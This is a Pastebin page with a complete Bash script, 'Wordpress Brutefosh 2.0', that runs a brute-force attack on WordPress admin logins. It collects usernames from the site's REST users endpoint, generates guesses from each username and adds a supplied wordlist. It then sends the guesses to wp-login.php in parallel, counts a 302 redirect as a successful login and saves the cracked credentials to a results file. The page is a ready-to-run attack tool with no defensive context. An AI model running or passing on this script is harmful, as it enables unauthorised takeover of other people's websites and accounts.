SHARE
TWEET

[BASH] Wordpress Brutefosh 2.0 - Auto Generate Password

zerobyte-id Mar 29th, 2019 (edited) 252 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Name       : Wordpress Brutefosh
  3. # Version    : 2.0
  4. # Desc.      : Dictionary Attack Tool - Wordpress Admin
  5. # Coded by   : Schopath
  6. # Website    : www.zerobyte.id
  7. # Updated on : 2019-03-29
  8.  
  9. #----------- CONFIGURATION -----------
  10. curl_timeout=20
  11. multithread_limit=10
  12. #--------- CONFIGURATION EOF ---------
  13.  
  14. if [[ -f wpusername.tmp ]]
  15. then
  16.     rm wpusername.tmp
  17. fi
  18.  
  19. RED='\e[31m'
  20. GRN='\e[32m'
  21. YEL='\e[33m'
  22. CLR='\e[0m'
  23.  
  24. function _GetUserWPJSON() {
  25.     Target="${1}";
  26.     UsernameLists=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-json/wp/v2/users" | grep -Po '"slug":"\K.*?(?=")');
  27.     echo ""
  28.     if [[ -z ${UsernameLists} ]];
  29.     then
  30.         echo -e "${YEL}INFO: Cannot detect Username!${CLR}"
  31.     else
  32.         echo -ne > wpusername.tmp
  33.         for Username in ${UsernameLists};
  34.         do
  35.             echo "INFO: Found username \"${Username}\"..."
  36.             echo "${Username}" >> wpusername.tmp
  37.         done
  38.     fi
  39. }
  40.  
  41. function _TestLogin() {
  42.     Target="${1}"
  43.     Username="${2}"
  44.     Password="${3}"
  45.     LetsTry=$(curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s -w "\nHTTP_STATUS_CODE_X %{http_code}\n" "${Target}/wp-login.php" --data "log=${Username}&pwd=${Password}&wp-submit=Log+In" --compressed)
  46.     if [[ ! -z $(echo ${LetsTry} | grep login_error | grep div) ]];
  47.     then
  48.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  49.     elif [[ $(echo ${LetsTry} | grep "HTTP_STATUS_CODE_X" | awk '{print $2}') == "302" ]];
  50.     then
  51.         echo -e "${GRN}[!] FOUND ${Target} \e[30;48;5;82m ${Username}:${Password} ${CLR}"
  52.         echo "${Target} [${Username}:${Password}]" >> wpbf-results.txt
  53.     else
  54.         echo -e "${YEL}INFO: Invalid ${Target} ${Username}:${Password}${CLR}"
  55.     fi
  56. }
  57.  
  58. function PasswdGenerator() {
  59.     WORD="${1}"
  60.     echo "${WORD}"
  61.     echo "${WORD}" | tr a-z A-Z
  62.     echo "${WORD}123"
  63.     echo "${WORD}123" | tr a-z A-Z
  64.     echo "${WORD}admin"
  65.     echo "${WORD}${WORD}"
  66.     echo "${WORD}${WORD}123"
  67.     echo "${WORD}${WORD}" | tr a-z A-Z
  68.     echo "${WORD}${WORD}123" | tr a-z A-Z
  69.     foo=${WORD:0};echo ${foo^}
  70.     foo=${WORD:0};echo ${foo^}123
  71.     for ((c=1;c<=99;c++))
  72.     do
  73.         echo "${WORD}${c}"
  74.     done
  75.     for ((c=1;c<=9;c++))
  76.     do
  77.         echo "${WORD}0${c}"
  78.     done
  79.     for ((c=1900;c<=$(date +%Y);c++))
  80.     do
  81.         echo "${WORD}${c}"
  82.     done
  83.     for ((c=1;c<=99;c++))
  84.     do
  85.         foo=${WORD:0};echo ${foo^}${c}
  86.     done
  87.     for ((c=1;c<=9;c++))
  88.     do
  89.         foo=${WORD:0};echo ${foo^}0${c}
  90.     done
  91.     for ((c=1900;c<=$(date +%Y);c++))
  92.     do
  93.         foo=${WORD:0};echo ${foo^}${c}
  94.     done
  95. }
  96.  
  97. echo ' _    _               _                         '
  98. echo '| |  | | ___  _ __ __| |_ __  _ __ ___  ___ ___ '
  99. echo '| |/\| |/ _ \| `__/ _` | `_ \| `__/ _ \/ __/ __|'
  100. echo '\  /\  / (_) | | | (_| | |_) | | |  __/\__ \__ \'
  101. echo ' \/  \/ \___/|_|  \__,_| .__/|_|  \___||___/___/'
  102. echo '                       |_|.::Brutefo(sh) 2019::.'
  103. echo ''
  104.  
  105. echo -ne "[?] Input website target : "
  106. read Target
  107.  
  108. curl --connect-timeout ${curl_timeout} --max-time ${curl_timeout} -s "${Target}/wp-login.php" > wplogin.tmp
  109. if [[ -z $(cat wplogin.tmp | grep "wp-submit") ]];
  110. then
  111.     echo -e "${RED}ERROR: Invalid wordpress wp-login!${CLR}"
  112.     exit
  113. fi
  114.  
  115. echo -ne "[?] Input password lists in (file) : "
  116. read PasswordLists
  117.  
  118. if [[ ! -f ${PasswordLists} ]]
  119. then
  120.     echo -e "${RED}ERROR: Wordlists not found!${CLR}"
  121.     PasswordLists=/dev/null
  122. fi
  123.  
  124. _GetUserWPJSON ${Target}
  125.  
  126. if [[ -f wpusername.tmp ]]
  127. then
  128.     for User in $(cat wpusername.tmp)
  129.     do
  130.         echo "INFO: Generate password from ${User}..."
  131.         echo -ne "" > wpbf-passwords.lst.tmp
  132.         PasswdGenerator ${User} >> wpbf-passwords.lst.tmp
  133.         cat ${PasswordLists} >> wpbf-passwords.lst.tmp
  134.         (
  135.             for Pass in $(cat wpbf-passwords.lst.tmp)
  136.             do
  137.                 ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  138.                 _TestLogin ${Target} ${User} ${Pass} &
  139.             done
  140.             wait
  141.         )
  142.     done
  143.     echo -ne "" > wpbf-passwords.lst.tmp
  144.     rm wpbf-passwords.lst.tmp
  145. else
  146.     echo -e "${YEL}INFO: Cannot find username${CLR}"
  147.     echo -ne "[?] Input username manually : "
  148.     read User
  149.     if [[ -z ${User} ]]
  150.     then
  151.         echo -e "${RED}ERROR: Username cannot be empty!${CLR}"
  152.         exit
  153.     fi
  154.     echo "INFO: Generate password from ${User}..."
  155.     echo -ne "" > wpbf-passwords.lst.tmp
  156.     PasswdGenerator ${User} >> wpbf-passwords.lst.tmp
  157.     cat ${PasswordLists} >> wpbf-passwords.lst.tmp
  158.     (
  159.         for Pass in $(cat wpbf-passwords.lst.tmp)
  160.         do
  161.             ((cthread=cthread%multithread_limit)); ((cthread++==0)) && wait
  162.             _TestLogin ${Target} ${User} ${Pass} &
  163.         done
  164.         wait
  165.     )
  166.     echo -ne "" > wpbf-passwords.lst.tmp
  167.     rm wpbf-passwords.lst.tmp
  168. fi
  169. echo "INFO: Found $(cat wpbf-results.txt | grep ${Target} | sort -nr | uniq | wc -l) username & password in ./wpbf-results.txt"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top